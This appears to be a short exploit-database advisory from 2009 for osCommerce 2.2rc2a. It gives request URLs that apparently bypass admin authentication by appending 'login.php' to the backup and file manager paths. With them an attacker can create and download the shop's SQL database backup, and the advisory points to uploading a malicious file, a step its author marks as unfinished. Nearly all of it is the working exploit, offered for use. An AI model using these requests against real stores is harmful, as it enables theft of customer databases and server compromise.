======================================================================================== $ | # Title : osCommerce online SHop Backup Vulnerability $ | # Author : indoushka | | # email : indoushka@hotmail.com | | # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) | | # EDB-ID : | | # CVE-ID : () | | # OSVDB-ID : () | | # DAte :16/12/2009 | | # Verified : | | # Web Site : www.iq-ty.com | | # Published: | | # Script : Powered by osCommerce online SHop http://www.oscommerce.com/ | | # Tested on: windows SP2 Fran碶ais V.(Pnx2 2.0) + Lunix Fran碶ais v.(9.4 Ubuntu) | | # Bug : Backup | ====================== Exploit By indoushka ================================= | # Exploit : | http://127.0.0.1/oscommerce-2.2rc2a/catalog/admin/backup/login.php?action=backup http://127.0.0.1/oscommerce-2.2rc2a/catalog/admin/backup/login.php?action=backupnow to download buckup :http://127.0.0.1/oscommerce-2.2rc2a/catalog/admin/backup/login.php?action=download&file=db_comm-20100301222138.sql db_comm-20100301222138.sql chang it to the name of the backup and you cant download it with IE i download it with opera 10.10 + Mozilla Firefox http://127.0.0.1/oscommerce-2.2rc2a/catalog/admin/file_manager/login.php?action=upload (2 upload ev!l "not finishid") go to original path http://127.0.0.1/oscommerce-2.2rc2a/catalog/ | ================================ Dz-Ghost Team ======================================== Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 | -------------------------------------------------------------------------------------------